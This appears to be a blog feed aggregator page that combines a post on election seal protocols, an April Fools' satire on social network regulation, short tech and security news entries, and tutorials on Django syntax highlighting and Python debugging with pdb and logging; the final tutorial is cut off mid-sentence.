    A seal use protocol can allow the seal user to gain some assurance that the sealed material has not been tampered with. But here is the critical problem with using seals in elections: Who is the seal user that needs this assurance? It is not just election officials: it is the citizenry.

    Democratic elections present a uniquely difficult set of problems to be solved by a security protocol. In particular, the ballot box or voting machine contains votes that may throw the government out of office. Therefore, it's not just the government—that is, election officials—that need evidence that no tampering has occurred, it's the public and the candidates. The election officials (representing the government) have a conflict of interest; corrupt election officials may hire corrupt seal inspectors, or deliberately hire incompetent inspectors, or deliberately fail to train them. Even if the public officials who run the elections are not at all corrupt, the democratic process requires sufficient transparency that the public (and the losing candidates) can be convinced that the process was fair.

    In the late 19th century, after widespread, pervasive, and long-lasting fraud by election officials, democracies such as Australia and the United States implemented election protocols in an attempt to solve this problem. The struggle to achieve fair elections lasted for decades and was hard-fought.

    A typical 1890s solution works as follows: At the beginning of election day, in the polling place, the ballot box is opened so that representatives of all political parties can see for themselves that it is empty (and does not contain hidden compartments). Then the ballot box is closed, and voting begins. The witnesses from all parties remain near the ballot box all day, so they can see that no one opens it and no one stuffs it. The box has a mechanism that rings a bell whenever a ballot is inserted, to alert the witnesses. At the close of the polls, the ballot box is opened, and the ballots are counted in the presence of witnesses.

    drawing of 1890 polling place

    (From Elements of Civil Government by Alexander L. Peterman, 1891)

    In principle, then, there is no single person or entity that needs to be trusted: the parties watch each other. And this protocol needs no seals at all!

    Democratic elections pose difficult problems not just for security protocols in general, but for seal use protocols in particular. Consider the use of tamper-evident security seals in an election where a ballot box is to be protected by seals while it is transported and stored by election officials out of the sight of witnesses. A good protocol for the use of seals requires that seals be chosen with care and deliberation, and that inspectors have substantial and lengthy training on each kind of seal they are supposed to inspect. Without trained inspectors, it is all too easy for an attacker to remove and replace the seal without likelihood of detection.

    Consider an audit or recount of a ballot box, days or weeks after an election. It reappears to the presence of witnesses from the political parties from its custody in the hands of election officials. The tamper evident seals are inspected and removed—but by whom?

    If elections are to be conducted by the same principles of transparency established over a century ago, the rationale for the selection of particular security seals must be made transparent to the public, to the candidates, and to the political parties. Witnesses from the parties and from the public must be able to receive training on detection of tampering of those particular seals. There must be (the possibility of) public debate and discussion over the effectiveness of these physical security protocols.

    It is not clear that this is practical. To my knowledge, such transparency in seal use protocols has never been attempted.


    Bibliographic citation for the research paper behind this whole series of posts:
    Security Seals On Voting Machines: A Case Study, by Andrew W. Appel. Accepted for publication, ACM Transactions on Information and System Security (TISSEC), 2011.

    Fri 01 April, 2011

    Channel Image22:24 The Next Step towards an Open Internet» Freedom to Tinker

    Now that the FCC has finally acted to safeguard network neutrality, the time has come to take the next step toward creating a level playing field on the rest of the Information Superhighway. Network neutrality rules are designed to ensure that large telecommunications companies do not squelch free speech and online innovation. However, it is increasingly evident that broadband companies are not the only threat to the open Internet. In short, federal regulators need to act now to safeguard social network neutrality.

    The time to examine this issue could not be better. Facebook is the dominant social network in countries other than Brazil, where everybody uses Friendster or something. Facebook has achieved near-monopoly status in the social networking market. It now dominates the web, permeating all aspects of the information landscape. More than 2.5 million websites have integrated with Facebook. Indeed, there is evidence that people are turning to social networks instead of faceless search engines for many types of queries.

    Social networks will soon be the primary gatekeepers standing between average Internet users and the web’s promise of information utopia. But can we trust them with this new-found power? Friends are unlikely to be an unbiased or complete source of information on most topics, creating silos of ignorance among the disparate components of the social graph. Meanwhile, social networks will have the power to make or break Internet businesses built atop the enormous quantity of referral traffic they will be able to generate. What will become of these businesses when friendships and tastes change? For example, there is recent evidence that social networks are hastening the decline of the music industry by promoting unknown artists who provide their music and streaming videos for free.

    Social network usage patterns reflect deep divisions of race and class. Unregulated social networks could rapidly become virtual gated communities, with users cut off from others who could provide them with a diversity of perspectives. Right now, there’s no regulation of the immense decision-influencing power that friends have, and there are no measures in place to ensure that friends provide a neutral and balanced set of viewpoints. Fortunately, policy-makers have a rare opportunity to preempt the dangerous consequences of leaving this new technology to develop unchecked.

    The time has come to create a Federal Friendship Commission to ensure that the immense power of social networks is not abused. For example, social network users who have their friend requests denied currently have no legal recourse. Users should have the option to appeal friend rejections to the FFC to verify that they don’t violate social network neutrality. Unregulated social networks will give many users a distorted view of the world dominated by the partisan, religious, and cultural prejudices of their immediate neighbors in the social graph. The FFC can correct this by requiring social networks to give equal time to any biased wall post.

    However, others have suggested lighter-touch regulation, simply requiring each person to have friends of many races, religions, and political persuasions. Still others have suggested allowing information harms to be remedied through direct litigation—perhaps via tort reform that recognizes a new private right of action against violations of the “duty to friend.” As social networking software will soon be found throughout all aspects of society, urgent intervention is needed to forestall “The Tyranny of The Farmville.”

    Of course, social network neutrality is just one of the policy tools regulators should use to ensure a level playing field. For example, the Department of Justice may need to more aggressively employ its antitrust powers to combat the recent dangerous concentration of social networking market share on popular micro-blogging services. But enacting formal social network neutrality rules is an important first step towards a more open web.

    Mon 28 March, 2011

    Channel Image22:46 Making and Using QR Codes» evolt.org - Workers of the Web, Evolt!
    If you happened to spend any time at SxSW this year, then you probably were inundated with QR codes everywhere you looked. People were attaching them to everything — backpacks, street signs, business cards and probably even pets. This walk-through covers the basics for making your own.

    Wed 23 February, 2011

    Channel Image09:41 WordPress Pagination Woes (solved? I hope?)» scriptygoddess
    For awhile now, I've run into pagination problems when doing custom templates and custom queries. I think I'm finally starting to figure out all the little nuances. For starters, in most cases this will get pagination working on a custom template with a standard query_posts(): $paged = (get_query_var('paged')) ? get_query_var('paged') : 1; That's the key [...] No related posts. Related posts brought to you by Yet Another Related Posts Plugin.

    Tue 14 December, 2010

    Channel Image11:41 Cron Explained» Linux Exposed
    @font-face { font-family: Calibri ; }@font-face { font-family: SimSun ; }@font-face { }p.MsoNormal, li.MsoNormal, div.MsoNormal .MsoChpDefault div.WordSection1 @font-face...

    Mon 06 December, 2010

    Channel Image11:05 Spyware Terminator 2.8.2.192» Help Net Security - Windows Software
    Free Spyware Terminator provides effective real-time detection and removal of spyware and incoming threats. Reliable and user-friendly, Spyware Terminator is free for personal and commercial use. Opti...
    Channel Image11:03 McAfee AVERT Stinger 10.1.0.1197» Help Net Security - Windows Software
    Stinger is a stand-alone utility used to detect and remove specific viruses. It is not a substitute for the full anti-virus protection, but rather a tool that assists administrators and users when ...

    Fri 03 December, 2010

    Channel Image21:47 Rising PC Doctor 6.0.2.96» Help Net Security - Windows Software
    Rising PC Doctor application was designed to be a professional and smart security tool for protection against malware. With its seven key functions of automatic malware analysis, immunization of US...
    Channel Image21:46 History Sweeper 3.23» Help Net Security - Windows Software
    History Sweeper allows you to clean up the history of activities on your computer and keep your privacy. It can delete your browser cache, history files, cookies (with option to keep selected ones) an...
    Channel Image21:45 Master Voyager 2.71» Help Net Security - Windows Software
    Master Voyager is especially designed to create protected DVD/CD discs and USB Memory Sticks. It creates protected areas on the media and it is needed to enter password to see protected contents. In a...
    Channel Image21:44 BestCrypt 8.20.7.5» Help Net Security - Windows Software
    BestCrypt data encryption systems bring military strength encryption to the ordinary computer user without the complexities normally associated with strong data encryption. BestCrypt creates and su...

    Thu 02 December, 2010

    Channel Image13:54 Data Guardian 2.0.3» Help Net Security - Windows Software
    Data Guardian is a secure database application with up to 448-bits of Blowfish encryption — regardless of how sensitive your data is. Create multiple databases in Data Guardian for a variety of purpos...

    Wed 01 December, 2010

    Channel Image18:40 GFI LANguard » Help Net Security - Windows Software
    GFI LANguard is a network security and vulnerability scanning tool on the market and is offered as a freeware version, allowing full functionality for up to 5 IPs. GFI LANguard also features powerf...
    Channel Image12:20 Malwarebytes Anti-Malware 1.50» Help Net Security - Windows Software
    Malwarebytes' Anti-Malware is an anti-malware application that thoroughly removes advanced malware and spyware. It's fast and effective, capable of recognizing malicious applications and distinguishin...

    Tue 30 November, 2010

    Channel Image13:16 Password Manager XP 3.0 Build 524» Help Net Security - Windows Software
    Password Manager XP is a program that will help you systematize secret information. You will forget about all your headaches which were caused by loss of passwords, access codes and other sensitive in...

    Tue 14 September, 2010

    Channel Image01:38 Google Instant and SEO/SEM» evolt.org - Workers of the Web, Evolt!
    There's quite the potential for change that this seemingly simple user interface change could have, both on user behavior and money spent on SEM/SEO. The next few weeks may prove to be very interesting.

    Fri 02 July, 2010

    Channel Image20:07 Fujitsu LifeBook PH520 released» Latest News on LaptopLogic
    The 11.6" display will be LED backlit and have a 1366x768 resolution. It will weigh just 3.08 lbs and manages about five and a half hours of runtime on the standard 6-cell battery. It will offer Bluetooth, 802.11n and both VGA and HDMI.

    There will be an AMD Athlon II Neo K125 1.7GHz CPU powering the notebook in conjunction with ATI Radeon HD 4225 integrated graphics. Up to 8GB DDR3 RAM and 320GB of storage are available, as is an external USB optical drive. The notebook will run Windows 7 Professional.

    Pricing starts at $599, and it is available today.

    Buy this laptop at TigerDirect.com

    Wed 30 June, 2010

    Channel Image16:06 ASUS Eee PC 1215N announced with Ion, Optimus, dual-core Atom» Latest News on LaptopLogic
    The ASUS Eee PC is a 12.1" "netbook" with a 1366x768 HD resolution, and HDMI for exporting 1080p out. It will include advanced hardware such as a 1.8GHz Intel Atom D525 CPU, NVIDIA Optimus switching between the integrated graphics and Ion discrete graphics, 250-320GB HDD plus 500GB ASUS WebStorage, and Bluetooth 3.0/USB 3.0 connectivity. ASUS @Vibe and access to Boingo hotspots will also come with purchase.

    Pricing or availability information is not known as of yet.

    Tue 29 June, 2010

    Channel Image18:09 UX Challenges in Touch Interfaces» evolt.org - Workers of the Web, Evolt!
    As mobile devices have been taking over the place of the mobile or home computer for basic apps and web access, developers are struggling with letting go of the mouse as the primary interface device.

    Mon 28 June, 2010

    Channel Image10:06 Samsung N230 Netbook now shipping» Latest News on LaptopLogic
    The Samsung N230 will be available with either Intel's Atom N450 or Atom N470 CPU. It will be very lightweight at under 1kg, and thin as well at under 1". Battery life will also be geared towards portability, with 7 hours available via the standard battery and just under 14 available with extended options. The 10.1" 1024x600 is LED backlit and anti-reflective. Connectivity options will include USB 3.0, Bluetooth 3.0, and 802.11bgn.

    The netbook is shipping starting today. Pricing information is not yet known.

    Wed 23 June, 2010

    Channel Image17:06 Maingear introduces newest gaming laptop eX-L 17» Latest News on LaptopLogic
    The Maingear eX-L 17 has a 17" 1080p display, and comes with CPUs from Intel Core i5 to Core i7-quad. Graphics cards range from a 1GB ATI Mobility Radeon 5870 to 2GB NVIDIA GeForce GTX480M or NVIDIA Quadro FX 2800M, RAM is available up to 8GB, and for storage you can choose form up to a 750GB HDD or 512MB SSD. Laser etching on the lid is also available.

    Prices start at $1899.99, and the laptop is available today.

    Buy this laptop at TigerDirect.com

    Tue 22 June, 2010

    Channel Image16:06 Acer Timeline X series now available in the US» Latest News on LaptopLogic
    All Timeline X laptops are housed in brushed black aluminum and measure at less than 1" thick, while weighing between just 3-5.5lbs.

    The 5.5lb, 15.6-inch Aspire 5820T and 4.65lb, 14-inch Aspire 4820T both come with integrated optical drives, Core i3-i5 CPUs, 320GB-500GB HDDs, and 4GB RAM. Both start at $749.99. The 13.3" Aspire 3820T weighs under four pounds and features the same options, starting at $729.99. The 11.6-inch Aspire 1830T (pictured) has the same options again, but with ULV CPUs, and starts at $599.99. The 14-inch Aspire 4820TG, starting at $799, also features ATI Mobility Radeon HD 5650 graphics.

    These laptops are available in the US as of today.

    Buy this laptop at newegg.com

    Mon 21 June, 2010

    Channel Image13:06 Sony uses AMD to power latest VAIOs» Latest News on LaptopLogic
    Popular retailers such as Best Buy and Fry's have begun selling Sony VAIO laptops powered by AMD processors like the AMD Athlon II X2. Two notable such laptops are the 15.5" (1366 x 768) Sony VAIO EE, which includes 4GB RAM and 320GB HDD, and the 17.3" (1600x900) Sony VAIO EF, which includes 4GB RAM and 500GB HDD.

    These devices are less expensive than their Intel counterparts, and are priced at $650 and $720, respectively.

    Buy this laptop at BestBuy.com

    Fri 18 June, 2010

    Channel Image12:06 Acer announces new Aspire One AO721, AO521» Latest News on LaptopLogic
    The AO721 is an LED-backlit 11.6" netbook and comes with 2GB DDR3 RAM and Windows 7 Home Premium. It weighs about 3lbs. The AO521 is a similarly LED-backlit 10.1" netbook with 1GB RAM and Windows 7 SE, weighing only 2.75lbs.

    Both laptops will feature an AMD Athlon II Neo K125 CPU and ATI Radeon HD 4225 graphics, as well as 802.11b/g/n and HDMI. The AO721 starts at $429.99, and the AO521 starts at $349.99.

    Shop for Acer Aspire One laptops on Amazon.com

    Thu 17 June, 2010

    Channel Image11:06 Lenovo announces 3D IdeaPad Y560d» Latest News on LaptopLogic
    The Lenovo IdeaPad Y560d will make use of TriDef's 3D technology, which means there will be a special coating on the screen that can convert 2D images to 3D with the help of software and glasses. It will also be available with up to a Core i7 CPU, 8GB RAM and a 1GB ATI Radeon HD5730 GPU. Other interesting features include Lenovo's RapidDrive technology, which combines SSD/HHD options to deliver improved performance. HDDs are available in capacities up to 750GB.

    The IdeaPad Y560d will be available at the end of the month, starting at $1199.99.

    Shop for laptops like this at Lenovo.com

    Wed 16 June, 2010

    Channel Image11:06 Toshiba releases Stellite L600, C600 series affordable laptops» Latest News on LaptopLogic
    There will be four L600 series laptops available, the 13" L635 (pictured), 14" L645, 15.6" L655, and 17.3" L675. These laptops will be available with Core i3-i5 CPUs or AMD processors from Athon II to Phenom II Quad Core, and they will also feature an optional ATI Radeon 5145 GPU. Additionally, they sport Toshiba's new Fusion X2 finish.

    There will also be two C600 series laptops available, the 14" C645 and 15.6" C655, with choice of Intel Celeron/Pentium or an AMD Athlon V120 processor.

    The Toshiba L600 series will start at $515, and the C600 will start at $449.

    Buy this laptop at Toshiba.com

    Tue 15 June, 2010

    Channel Image16:06 Toshiba Satellite T200 Series now available in US» Latest News on LaptopLogic
    The 11.6" T215 will come with AMD Athlon II Neo single or dual-core CPUs, integrated graphics from ATI, and up to a 320GB HDD and 2GB RAM. The ultraportable notebook will weigh a mere 3.3lbs. The larger 13.3" T235 will also come with AMD Athlon II Neo or Turion II Neo processors, though it will additionally have a choice of Intel Pentium dual-cores. It will pack up to a 320GB HDD and 4GB RAM, and weighs just 3.9lbs.

    Both notebooks will have an HD 1366x768 display. They will be available in the US on June 20th starting at $469.99.

    Fri 04 June, 2010

    Channel Image15:16 The Future of Check-ins» evolt.org - Workers of the Web, Evolt!

    Last week Mashable featured a post asking if location-based services are all just hype. Continuing the geolocation theme Mashable has a new post, What the Future Holds for the Checkin, by a guest blogger/columnist. I have a reservations about how well this article delves into future opportunities, so I just toss a few out here.

    Tue 04 May, 2010

    Channel Image23:25 Using IPC -- pipes» Linux Exposed
    The other day on IRC someone asked me how he should go about calling an external program, sending it input...

    Sun 25 April, 2010

    Channel Image21:40 Syntax Highlighting in Django with Markdown and Pygments » Ayman Hourieh | Blog Feed

    I find Markdown to be a more readable and usable alternative to XHTML/CSS for formatting text, and I use it to format my articles at this Django-powered blog. When implementing syntax highlighting for code blocks within text, I searched for existing solutions and found many approaches that were too complicated and had shortcomings. After more research, I realized that syntax highlighting works out of the box in Django if you have a recent version of Markdown.

    Here are the required steps to enable syntax highlighting in your Django application. First, install python-markdown version 2.0+ and python-pygments. Pygments is a syntax highlighter written in Python. Markdown 2.0+ has an extension system and comes with a syntax highlighting extension that uses Pygments. This extension is called CodeHilite. To use it, add the following to a Django template:

    {% load markup %}
    {{ text|markdown:'codehilite' }}
    

    Next, you need to create a stylesheet that defines colors for syntax highlighting. To do so, run the following command:

    $ pygmentize -S default -f html -a .codehilite > code.css
    

    Include code.css in your template.

    Now, to create a syntax-highlighted code block, indent the block by 4 spaces and declare the language of the block at the first line, prefixed by ::: (3 colons). This is better explained by example. The following text:

    :::python
    print 'Hello, World.'
    

    Produces the following syntax-highlighted code block:

    print 'Hello, World.'
    

    Keep in mind that Markdown allows embedded HTML elements by default. You shouldn't enable this if the source of the text is untrusted. To disable HTML elements, use the following in your Django template instead:

    {% load markup %}
    {{ text|markdown:'safe,codehilite' }}
    

    Pygments supports a long list of languages and styles. Be sure to check the demos too.

    Twitter Facebook Google Buzz Reddit Hacker News StumbleUpon Digg Delicious

    Read the comments on this post.

    Channel Image19:08 Blog Migrated to Django » Ayman Hourieh | Blog Feed

    I've been meaning to migrate my website from Drupal to Django for a very long time. Although Drupal is an excellent content management system, I got tired of working with PHP every time I wanted to add a feature or make a change. My previous web host didn't support Python so I had to stick with PHP. Recently however, I moved the website to a VPS at Linode and decided to migrate to Django as well.

    Writing a blog application in Django took very little time thanks to the reusable apps that come with Django, like syndication, comments and admin. I also had to port the blog design to Django templates and migrate the content from HTML to Markdown. I've been using Markdown at StackOverflow and I really like it. It's concise, readable and much easier to work with in a text editor than HTML. I wrote a small script to convert existing articles from the subset of HTML that I was using to Markdown.

    To run the website, I'm using Apache2/mod_wsgi for the backend, and nginx as a frontend. I chose mod_wsgi because it's very flexible. As for nginx, I chose it because it integrates nicely with StaticGenerator, a Django middleware that caches pages as files on local disk. StaticGenerator has an important advantage over using Memcached with Django: cached pages are served by nginx without hitting Django at all, so it's much faster. A quick benchmark on my setup showed that it was 8 times faster. StaticGenerator can only cache full pages, but this is fine for my needs.

    The blog feed now contains full articles (as opposed to short summaries). This should be more convenient to those who read the blog via the feed.

    Twitter Facebook Google Buzz Reddit Hacker News StumbleUpon Digg Delicious

    Read the comments on this post.

    Sat 24 April, 2010

    Channel Image21:49 PyCon 2010 Lightning Talk, Python Debugging Techniques » Ayman Hourieh | Blog Feed

    I did a lightning talk at PyCon 2010 based on my Python debugging techniques article. Here is the video. My talk starts around 7:30:

    And here are the slides:

    Twitter Facebook Google Buzz Reddit Hacker News StumbleUpon Digg Delicious

    Read the comments on this post.

    Sat 10 April, 2010

    Channel Image19:53 Mapping Location-Based Social Media» evolt.org - Workers of the Web, Evolt!
    If you have been paying any attention to the social media space for the last few years, then you've watched the rise in location-based social media. Part of the appeal of these tools is seeing where you have been, almost like a travelogue for a person, as well as tracking others (friends or family). It has taken some time, but the rest of the web is finally catching up.

    Wed 10 March, 2010

    Channel Image00:00 News: Change in Focus» SecurityFocus News
    Change in Focus

    Thu 04 March, 2010

    Channel Image00:00 News: Monster botnet held 800,000 people's details» SecurityFocus News
    Monster botnet held 800,000 people's details

    >> Advertisement <<
    Can you answer the ERP quiz?
    These 10 questions determine if your Enterprise RP rollout gets an A+.
    http://www.findtechinfo.com/as/acs?pl=781&ca=909
    Channel Image00:00 News: Google: 'no timetable' on China talks» SecurityFocus News
    Google: 'no timetable' on China talks

    Fri 26 February, 2010

    Channel Image00:00 News: Latvian hacker tweets hard on banking whistle» SecurityFocus News
    Latvian hacker tweets hard on banking whistle

    Thu 25 February, 2010

    Channel Image00:00 News: MS uses court order to take out Waledac botnet» SecurityFocus News
    MS uses court order to take out Waledac botnet

    >> Advertisement <<
    Can you answer the ERP quiz?
    These 10 questions determine if your Enterprise RP rollout gets an A+.
    http://www.findtechinfo.com/as/acs?pl=781&ca=909

    Tue 02 February, 2010

    Channel Image00:00 Brief: Google offers bounty on browser bugs» SecurityFocus News
    Google offers bounty on browser bugs

    Thu 28 January, 2010

    Channel Image00:00 Brief: Cyberattacks from U.S. "greatest concern"» SecurityFocus News
    Cyberattacks from U.S. "greatest concern"

    >> Advertisement <<
    Can you answer the ERP quiz?
    These 10 questions determine if your Enterprise RP rollout gets an A+.
    http://www.findtechinfo.com/as/acs?pl=781&ca=909

    Tue 26 January, 2010

    Channel Image18:27 Define "Cognitive Disability"» evolt.org - Workers of the Web, Evolt!
    With WCAG guidelines, and by extension federal guidelines, referencing "cognitive disability" as one form of disability which developers need to support, you'd be hard-pressed to find a definition of the term anywhere in those guidelines.
    Channel Image18:23 Mobile Internet Use Continues Climb» evolt.org - Workers of the Web, Evolt!
    As mobile devices are more common, and browsing the web on them has gotten even easier, we can expect to see them continue to gain ground on traditional computers for casual web surfing.

    Thu 21 January, 2010

    Channel Image00:00 Brief: Microsoft patches as fraudsters target IE flaw» SecurityFocus News
    Microsoft patches as fraudsters target IE flaw

    Wed 20 January, 2010

    Channel Image18:43 Accessible Video and Transcripts» evolt.org - Workers of the Web, Evolt!
    With HTML5 on the horizon, it is becoming far easier to embed video on a web page than it has been. However, you also need to bear in mind that not only are video (and audio) transcripts good practice, they are required by law for many organizations.

    Mon 18 January, 2010

    Channel Image19:31 The Latest on HTML5» evolt.org - Workers of the Web, Evolt!
    Many of us have been following the ongoing progress of HTML5 for some time now, alternately curious and confused by the nascent specification. How'd we get here and what do we, as web developers, do?
    Channel Image00:00 Brief: Attack on IE 0-day refined by researchers» SecurityFocus News
    Attack on IE 0-day refined by researchers

    Wed 06 January, 2010

    Channel Image19:18 W3C: Contacting Organizations about Inaccessible Websites» evolt.org - Workers of the Web, Evolt!
    The W3C WAI has just published a document, "Contacting Organizations about Inaccessible Websites," that helps walk users through the steps necessary to contact someone about the accessibility issues you find on a site, along with tips and sample emails.

    Tue 05 January, 2010

    Channel Image23:39 Lots of Twitter Followers Guarantees... Nothing» evolt.org - Workers of the Web, Evolt!
    What does it mean to have a huge number of Twitter followers? What does it do for you? The answer to both is: Nothing.

    Fri 18 December, 2009

    Channel Image00:00 News: Twitter attacker had proper credentials» SecurityFocus News
    Twitter attacker had proper credentials
    Channel Image00:00 News: PhotoDNA scans images for child abuse» SecurityFocus News
    PhotoDNA scans images for child abuse

    >> Advertisement <<
    Can you answer the ERP quiz?
    These 10 questions determine if your Enterprise RP rollout gets an A+.
    http://www.findtechinfo.com/as/acs?pl=781&ca=909

    Thu 17 December, 2009

    Channel Image22:52 New Tool for Determining Browser Viewport Size» evolt.org - Workers of the Web, Evolt!
    Nine years ago I had become fed up with trying to explain that screen resolution, browser chrome, and browser size combine to create some unique viewport sizes. Today Google has gotten a little closer to getting the point with its Browser Size tool.

    Wed 16 December, 2009

    Channel Image00:00 News: Conficker data highlights infected networks» SecurityFocus News
    Conficker data highlights infected networks

    Tue 15 December, 2009

    Channel Image21:28 More News in the URL Shortener Market» evolt.org - Workers of the Web, Evolt!
    Back in October I commented how the list of URL shorteners has gotten even shorter. As bit.ly rose to the top thanks to Twitter, Tr.im and Cli.gs called it quits. Things have changed a bit since then.

    Sun 13 December, 2009

    Channel Image16:29 How Many Disabled Users?» evolt.org - Workers of the Web, Evolt!
    There is an article over at Practical Ecommerce titled Accessibility: How Many Disabled Web Users Are There? It is refreshing to see more traditional sites dealing with accessibility, especially when it can so significantly affect their bottom line.

    Fri 20 November, 2009

    Channel Image22:53 YouTube Will Automatically Caption Your Video» evolt.org - Workers of the Web, Evolt!
    Google can use its speech recognition technology to parse the audio track of your videos and create captions automatically. Much like machine translation, the quality of these captions may not be the best, but it can at least provide enough information for a user who could not otherwise understand the video at all to glean some meaning and value.

    Mon 31 August, 2009

    Channel Image10:54 Python Debugging Techniques » Ayman Hourieh | Blog Feed

    This article covers several techniques for debugging Python programs. The applicability of these techniques ranges from simple scripts to complex applications. The topics that are covered include launching an interactive console from within your program, using the Python debugger, and implementing robust logging. Various tips are included along the way to help you debug and fix problems quickly and efficiently.

    Launching an interactive console with code.interact()

    The Python interactive console is an awesome tool for experimenting with Python code. It provides a read-eval-print loop that allows you to experiment with Python code easily and quickly, without having to write and run a complete program. Wouldn't be convenient if you could use the same technique to debug an existing program? Fortunately, this is already possible thanks to the code module. This module has a function called interact() that stops execution and gives you an interactive console to examine the current state of your program. To use this function, simply embed the following at the line were you want the console to start:

    import code; code.interact(local=locals())
    

    The resulting console inherits the local scope of the line on which code.interact() is called. This enables you to check the current state of your program to understand its behavior and make any necessary corrections.

    To exit the interactive console and continue with the execution of your program, press Ctrl+D in Unix/Linux systems, or Ctrl+Z in Windows. Alternatively, you can type exit() in the console and hit enter to exit the console and abort your program.

    Using the Python Debugger

    When you need to examine the execution flow of your program, an interactive console is not going to be enough. For situations like this, you can use the Python debugger. It provides a full-fledged debugging environment that supports breakpoints, stepping through source code, stack inspection and much more. This debugger comes with the standard python distribution as a module named pdb.

    To learn how to use pdb, let's write a simple program that calculates the first 10 Fibonacci numbers:

    def main():
      low, high = 0, 1
      for i in xrange(10):
        print high
        low, high = high, low + high
    
    if __name__ == '__main__':
      main()
    

    Assuming that the file name is fib.py, we can run the program in pdb using the following command:

    $ python -m pdb fib.py
    

    The command results in the following output:

    > fib.py(1)<module>()
    -> def main():
    (Pdb)
    

    The first line of output contains the current module name, line number and function name (function name currently appears as <module>() because we are still at module level). The second line of output contains the current line of source code that is being executed. pdb also provides an interactive console to debug the program. This console is different from the familiar Python console. You can see its commands by typing help and hitting enter. Also, typing help <command> gives you help on the command you provided. Let's learn about these commands.

    Stepping through program execution

    The list command prints a few lines of context around the current line. Let's give it a try:

    (Pdb) list
      1  -> def main():
      2       low, high = 0, 1
      3       for i in xrange(10):
      4         print high
      5         low, high = high, low + high
      6  
      7     if __name__ == '__main__':
      8       main()
    [EOF]
    

    Next, let's step through our program. The next command executes the current line and moves next.

    (Pdb) next
    > fib.py(7)<module>()
    -> if __name__ == '__main__':
    

    At this point, the main() function has been defined, but not called. This is why the execution has jumped to the if condition on line 7. Let's call next again:

    (Pdb) n
    > fib.py(8)<module>()
    -> main()
    

    We are now about to call the main() function. Running next at this point will call main() and move to the next line. Since we are at the end of the file, this means that the program will finish executing. But we don't want this; we want to step into the main() function. To do this, we use the step command:

    (Pdb) step
    --Call--
    > fib.py(1)main()
    -> def main():
    

    From here, you can continue calling next to step through the main(). If at some point you want to examine the value of a variable, you can use the pp command (short for pretty-print):

    (Pdb) pp high
    2
    

    If you are done with examining the main() function, you can either use the continue command, which exits the debugging console and continues the execution of the program, or use the return, which continues the execution until the current function returns. Alternatively, you can stop the execution altogether and abort by using the exit command.

    Setting breakpoints

    Next, we will learn about breakpoints. More often than not, you want to invoke the debugger at a particular function or line number, rather than step through the execution of the whole program. To do so, you can set a breakpoint and continue the execution of the program. When the breakpoint is reached, the debugger is invoked.

    To set a breakpoint, use the break command. It takes a file name and line number or function name. To break at line 4 in fib.py, use:

    (Pdb) break fib.py:4
    

    To break when the main() function is called, use:

    (Pdb) break fib.main
    

    Furthermore, you can attach a condition to the breakpoint. Execution breaks only if this condition is True. For example, to break at line 4 in fib.py when high is greater than 10, use:

    (Pdb) break fib.py:4, high > 10
    

    The best pdb tip

    Now it's time for my favorite feature in pdb. It you put the following snippet somewhere in your program and run it normally, execution will stop and a debugging session will start when this line is reached:

    import pdb; pdb.set_trace()
    

    This approach is very convenient because it does not require launching your program in a special way or remembering to set breakpoints. You simply add the line above and start the program normally, and the debugger will be invoked exactly where you want. In practice, I think you will use this snippet to start pdb most of the time.

    Summary of pdb commands and short forms

    Finally, pdb commands have short forms. The following table summarizes the commands presented in this section, and their short forms:

    Command Short form Description
    break b Set a breakpoint.
    continue c Continue with program execution.
    exit q Abort the program.
    help h Print list of commands or help for a given command.
    list l Show source code around current line.
    return r Continue execution until the current function returns.

    Logging

    A primitive way of debugging programs is to embed print statements through out the code to track execution flow and state. However, this approach can quickly become unmaintainable for a number of reasons:

    • Normal program output is mixed with debugging output. This makes it difficult to distinguish between the two.
    • There is no easy way to disable debugging output, or redirect it to a file.
    • When done with debugging, it may be difficult to track down and remove all print statements that are scattered over the code.

    Python provides an alternative to debug print statements that doesn't suffer from the shortcomings above. This alternative comes in the form of a module called logging, and it is very powerful and easy to use.

    Let's start with a simple example. The following snippet imports the logging module and sets the logging level to debug:

    import logging
    
    logging.basicConfig(level=logging.DEBUG)
    

    The call to logging.basicConfig() should be done once when your program starts. Now, whenever you want to print a debug message, call logging.debug():

    logging.debug('This is a debug message.')
    

    This will send the following string to stderr:

    DEBUG:root:This is a debugging message.
    

    DEBUG indicates that this is a debug message. root indicates that this is the root logger, as it is possible to have multiple loggers (don't worry about this for now).

    Now we have a better logging system that can be globally switched on and off. To turn off debug messages, simply omit the level argument when calling logging.basicConfig():

    logging.basicConfig()
    

    Logging to a file and adding date/time

    To take full advantage of the logging module, let's have a look at some of the options that can be provided to logging.basicConfig():

    Argument Description
    filename Send log messages to a file.
    filemode The mode to open the file in (defaults to 'a').
    format The format of log messages.
    dateformat date/time format in log messages.
    level Level of messages to be printed (more on this later).

    For example, to configure the logging module to send debug messages to a file called debug.log, use:

    logging.basicConfig(level=logging.DEBUG, filename='debug.log')
    

    Log messages will be appended to debug.log if the file already exists. This means that your log messages will be kept even if you run your program multiple times.

    To add date/time to your log messages, use:

    logging.basicConfig(level=logging.DEBUG, filename='debug.log',
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%Y-%m-%d %H:%M:%S')
    

    This will result in log messages like the following:

    2009-08-30 23:30:49 DEBUG: This is a debug message.
    

    Logging levels

    The logging supports multiple levels of log messages in addition to DEBUG. Here is the full list:

    Level Function
    logging.CRITICAL logging.critical()
    logging.ERROR logging.error()
    logging.WARNING logging.warning()
    logging.INFO logging.info()
    logging.DEBUG logging.debug()

    Setting the logging level to a value enables log messages for this level and all levels above it. So if you set the level to logging.WARNING, you will get WARNING, ERROR and CRITICAL messages. This allows you to have different levels of log verbosity.

    Convenient template for logging

    Before I conclude this section, I will provide a simple template for enabling logging functionality in your programs. This template uses command-line flags to change the level logging, which is more convenient that modifying source code.

    import logging
    import optparse
    
    LOGGING_LEVELS = {'critical': logging.CRITICAL,
                      'error': logging.ERROR,
                      'warning': logging.WARNING,
                      'info': logging.INFO,
                      'debug': logging.DEBUG}
    
    def main():
      parser = optparse.OptionParser()
      parser.add_option('-l', '--logging-level', help='Logging level')
      parser.add_option('-f', '--logging-file', help='Logging file name')
      (options, args) = parser.parse_args()
      logging_level = LOGGING_LEVELS.get(options.logging_level, logging.NOTSET)
      logging.basicConfig(level=logging_level, filename=options.logging_file,
                          format='%(asctime)s %(levelname)s: %(message)s',
                          datefmt='%Y-%m-%d %H:%M:%S')
    
      # Your program goes here.
      # You can access command-line arguments using the args variable.
    
    if __name__ == '__main__':
      main()
    

    By default, the logging module prints critical, error and warning messages. To change this so that all levels are printed, use:

    $ ./your-program.py --logging=debug
    

    To send log messages to a file called debug.log, use:

